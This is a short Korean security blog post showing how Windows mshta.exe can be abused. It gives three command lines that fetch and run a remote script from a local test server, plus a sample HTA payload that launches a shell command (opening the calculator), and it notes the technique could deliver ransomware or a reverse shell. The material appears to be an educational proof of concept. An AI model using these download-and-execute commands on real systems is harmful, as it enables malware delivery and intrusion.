๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
๐Ÿ”’์ •๋ณด๋ณด์•ˆ/์‹œ์Šคํ…œ ๋ณด์•ˆ

์‹œ์Šคํ…œ ๋ณด์•ˆ - ์œˆ๋„์šฐ MSHTA(Microsoft HTML Application) ๊ณต๊ฒฉ

by Janger 2023. 2. 7.
728x90
๋ฐ˜์‘ํ˜•

 

command-line

 

mshta.exe vbscript:Close(Execute("GetObject(""script:http://127.0.0.1:4444/payload.sct"")"))
mshta.exe http://127.0.0.1:4444/payload.hta
mshta.exe \\127.0.0.1\folder\payload.hta

 

 

payload.hta (SCT payloads)

 

<html>
  <head>
    <HTA:APPLICATION ID="HelloExample">
    <script language="jscript">
      new ActiveXObject('WScript.Shell').Run("cmd.exe /c calc.exe");
    </script>
  </head>
  <body>
    <script>self.close();</script>
  </body>
</html>

 

 

๊ฒฐ๊ณผ

 

์‹คํ–‰์‹œ ๊ณ„์‚ฐ๊ธฐ๊ฐ€ ์—ด๋ฆฌ๊ฒŒ ๋œ๋‹ค.

 

 

 

HTA(HTML Application) 

 

 

๋ณด๋Š” ๊ฒƒ์ฒ˜๋Ÿผ ์œˆ๋„์šฐ์— ๊ธฐ๋ณธ์ ์œผ๋กœ ์„ค์น˜๋œ mshta.exe(Microsoft HTML Application)๋Š” ๋งˆ์น˜ ์›น ๋ธŒ๋ผ์šฐ์ €์ฒ˜๋Ÿผ ์™ธ๋ถ€์— ์žˆ๋Š” ์›น ํŽ˜์ด์ง€๋ฅผ ์š”์ฒญํ•˜๋Š” ๊ธฐ๋Šฅ์„ ๊ฐ€์ง€๊ณ  ์žˆ๋‹ค. 

 

์—ฌ๊ธฐ์„œ ๋ฌธ์ œ์ ์€ ์—ฌ๊ธฐ์— ๋‚ด์žฅ๋œ ๋ธŒ๋ผ์šฐ์ €๊ฐ€ ์ธํ„ฐ๋„ท ์ต์Šคํ”Œ๋กœ๋Ÿฌ ๊ธฐ๋ฐ˜์ธ์ง€ ActiveXObject๊ฐ€ ์‹คํ–‰์ด ๊ฐ€๋Šฅํ•ด ์‰˜ ๋ช…๋ น์–ด๊ฐ€ ์ œ๋Œ€๋กœ ์ž‘๋™์„ ํ•œ๋‹ค. (๋”ฐ๋กœ ActiveXObject๋ฅผ ์‹คํ–‰ํ•˜๊ฒ ๋ƒ๋Š” ๊ฒฝ๊ณ ๋ฌธ๋„ ๋‚˜์˜ค์ง€ ์•Š์•˜๋‹ค.)

 

์™ธ๋ถ€์— ์กด์žฌํ•˜๋Š” ์›น ํŽ˜์ด์ง€๋ฅผ ์š”์ฒญํ•˜๋Š” ์กฐํ•ฉ์—๋‹ค๊ฐ€ ์ปดํ“จํ„ฐ ๋‚ด์˜ ์‰˜์„ ์‹คํ–‰ํ•˜๋Š” ๋Œ€ํ™˜์žฅํŒŒํ‹ฐ๊ฐ€ ๋ฒŒ์–ด์ง€๋Š” ๊ฒƒ

๋žœ์„ฌ์›จ์–ด ์„ค์น˜๋Š” ๋ฌผ๋ก  ๋ฆฌ๋ฒ„์Šค์‰˜์„ ์—ฐ๊ฒฐํ•˜๋Š”๋ฐ๋Š” ์ด๊ฒƒ์ด ์ถฉ๋ถ„ํžˆ ์•…์šฉ๋  ์ˆ˜๊ฐ€ ์žˆ๋‹ค.  

 

 

 

 

 

์ถœ์ฒ˜: 

https://podalirius.net/en/articles/windows-reverse-shells-cheatsheet/

 

Windows Reverse Shells Cheatsheet

Windows Reverse Shells : 3 payloads in 1 different languages !

podalirius.net

 

https://www.ahnlab.com/kr/site/securityinfo/asec/asecView.do?groupCode=VNI001&seq=25631 

 

AhnLab | ASEC Report

์ตœ๊ณ ์˜ ์•…์„ฑ์ฝ”๋“œ ๋ถ„์„๊ฐ€ ๋ฐ ๋ณด์•ˆ ์ „๋ฌธ๊ฐ€ ์กฐ์ง์ธ ASEC(AhnLab Security Emergency response Center)์ด ์ตœ์‹  ๋ณด์•ˆ ์œ„ํ˜‘์— ๋Œ€ํ•œ ์ƒ์„ธํ•œ ๋ถ„์„ ์ •๋ณด๋ฅผ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค.

www.ahnlab.com

 

728x90
๋ฐ˜์‘ํ˜•